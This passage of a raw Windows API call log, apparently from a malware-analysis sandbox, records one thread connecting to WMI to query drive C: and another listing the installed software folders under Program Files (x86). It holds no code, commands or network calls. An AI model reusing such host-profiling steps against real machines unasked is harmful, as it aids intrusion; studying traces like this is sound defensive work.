out: pToken=0x6bce0c0) returned 0x0 [0212.277] CoGetContextToken (in: pToken=0x6bce4c8 | out: pToken=0x6bce4c8) returned 0x0 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce558 | out: ppvObject=0x6bce558*=0x0) returned 0x80004002 [0212.277] WbemLocator:IUnknown:Release (This=0x6736dc8) returned 0x2 [0212.277] WbemLocator:IUnknown:Release (This=0x6736dc8) returned 0x1 [0212.277] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0212.277] CoGetContextToken (in: pToken=0x6bcea98 | out: pToken=0x6bcea98) returned 0x0 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x6bceb68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bceb64 | out: ppvObject=0x6bceb64*=0x6736dc8) returned 0x0 [0212.277] WbemLocator:IUnknown:AddRef (This=0x6736dc8) returned 0x3 [0212.277] WbemLocator:IUnknown:Release (This=0x6736dc8) returned 0x2 [0212.277] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x6bcecfc | out: puCount=0x6bcecfc*=0x2) returned 0x0 [0212.277] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=8, puBuffLength=0x6bcecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcecf8*=0xf, pszText=0x0) returned 0x0 [0212.278] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=8, puBuffLength=0x6bcecf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcecf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.278] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcebd4 | out: ppv=0x6bcebd4*=0x6736e78) returned 0x0 [0212.278] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e78, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bcec68 | out: ppNamespace=0x6bcec68*=0x67483c4) returned 0x0 [0216.723] WbemLocator:IUnknown:QueryInterface (in: This=0x67483c4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb04 | out: ppvObject=0x6bceb04*=0x781274) returned 0x0 [0216.723] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781274, pProxy=0x67483c4, pAuthnSvc=0x6bceb54, pAuthzSvc=0x6bceb50, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c, pImpLevel=0x6bceb3c, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44 | out: pAuthnSvc=0x6bceb54*=0xa, pAuthzSvc=0x6bceb50*=0x0, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c*=0x6, pImpLevel=0x6bceb3c*=0x2, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44*=0x1) returned 0x0 [0216.723] WbemLocator:IUnknown:Release (This=0x781274) returned 0x1 [0216.723] WbemLocator:IUnknown:QueryInterface (in: This=0x67483c4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf8 | out: ppvObject=0x6bceaf8*=0x781294) returned 0x0 [0216.723] WbemLocator:IUnknown:QueryInterface (in: This=0x67483c4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf4 | out: ppvObject=0x6bceaf4*=0x781274) returned 0x0 [0216.723] WbemLocator:IClientSecurity:SetBlanket (This=0x781274, pProxy=0x67483c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.724] WbemLocator:IUnknown:Release (This=0x781274) returned 0x2 [0216.724] WbemLocator:IUnknown:Release (This=0x781294) returned 0x1 [0216.724] CoTaskMemFree (pv=0x77e118) [0216.724] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x0 [0216.724] WbemLocator:IUnknown:QueryInterface (in: This=0x67483c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce6f4 | out: ppvObject=0x6bce6f4*=0x781294) returned 0x0 [0216.724] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce6b0 | out: ppvObject=0x6bce6b0*=0x0) returned 0x80004002 [0216.726] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce4cc | out: ppvObject=0x6bce4cc*=0x0) returned 0x80004002 [0216.728] WbemLocator:IUnknown:AddRef (This=0x781294) returned 0x3 [0216.729] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce00c | out: ppvObject=0x6bce00c*=0x0) returned 0x80004002 [0216.730] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdfbc | out: ppvObject=0x6bcdfbc*=0x0) returned 0x80004002 [0216.736] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdfc8 | out: ppvObject=0x6bcdfc8*=0x7811f4) returned 0x0 [0216.736] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7811f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdfd0 | out: pCid=0x6bcdfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.736] WbemLocator:IUnknown:Release (This=0x7811f4) returned 0x3 [0216.736] CoGetContextToken (in: pToken=0x6bce028 | out: pToken=0x6bce028) returned 0x0 [0216.737] CoGetContextToken (in: pToken=0x6bce430 | out: pToken=0x6bce430) returned 0x0 [0216.737] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4c0 | out: ppvObject=0x6bce4c0*=0x78127c) returned 0x0 [0216.737] WbemLocator:IRpcOptions:Query (in: This=0x78127c, pPrx=0x781294, dwProperty=2, pdwValue=0x6bce4e8 | out: pdwValue=0x6bce4e8) returned 0x80004002 [0216.737] WbemLocator:IUnknown:Release (This=0x78127c) returned 0x3 [0216.737] WbemLocator:IUnknown:Release (This=0x781294) returned 0x2 [0216.737] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0216.737] CoGetContextToken (in: pToken=0x6bce968 | out: pToken=0x6bce968) returned 0x0 [0216.737] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x6bcea38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcea34 | out: ppvObject=0x6bcea34*=0x67483c4) returned 0x0 [0216.737] WbemLocator:IUnknown:AddRef (This=0x67483c4) returned 0x4 [0216.737] WbemLocator:IUnknown:Release (This=0x67483c4) returned 0x3 [0216.737] WbemLocator:IUnknown:Release (This=0x67483c4) returned 0x2 [0216.737] SysStringLen (param_1=0x0) returned 0x0 [0216.737] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6bcedcc | out: puCount=0x6bcedcc*=0x0) returned 0x0 [0216.737] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedc8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedc8*=0x20, pszText=0x0) returned 0x0 [0216.737] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.737] CoGetContextToken (in: pToken=0x6bcea38 | out: pToken=0x6bcea38) returned 0x0 [0216.737] WbemLocator:IUnknown:AddRef (This=0x781294) returned 0x3 [0216.737] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce8cc | out: ppvObject=0x6bce8cc*=0x781294) returned 0x0 [0216.738] WbemLocator:IUnknown:Release (This=0x781294) returned 0x3 [0216.738] WbemLocator:IUnknown:Release (This=0x781294) returned 0x2 [0216.738] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedd0*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd0*=0x20, pszText=0x0) returned 0x0 [0216.738] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.738] IWbemServices:GetObject (This=0x67483c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bced84*=0x0, ppCallResult=0x0) Thread: id = 133 os_tid = 0xac4 [0131.525] SysReAllocStringLen (in: pbstr=0x6cef444*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6cef444*="KERNEL32.DLL") returned 1 [0131.525] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.528] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.529] SysReAllocStringLen (in: pbstr=0x6cef444*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6cef444*="KERNEL32.DLL") returned 1 [0131.529] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.531] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.532] SysReAllocStringLen (in: pbstr=0x6cef420*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6cef420*="KERNEL32.DLL") returned 1 [0131.532] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.534] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.537] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.537] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceee6c) returned 1 [0131.538] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x6cee974, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0131.538] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x105, lpBuffer=0x6cee948, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x0) returned 0x17 [0131.538] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x6ceeb94 | out: lpFindFileData=0x6ceeb94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0131.538] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa547efa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xa547efa0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbbcbea0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbcbea0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0131.540] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0131.540] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0131.540] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0131.540] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xdbc3e2c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc3e2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0131.540] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0133.848] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdbc64420, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc64420, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0133.848] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553ced90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0133.848] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbc3e2c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc3e2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0133.850] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0133.850] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b7348a4, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b7348a4, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0133.850] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, 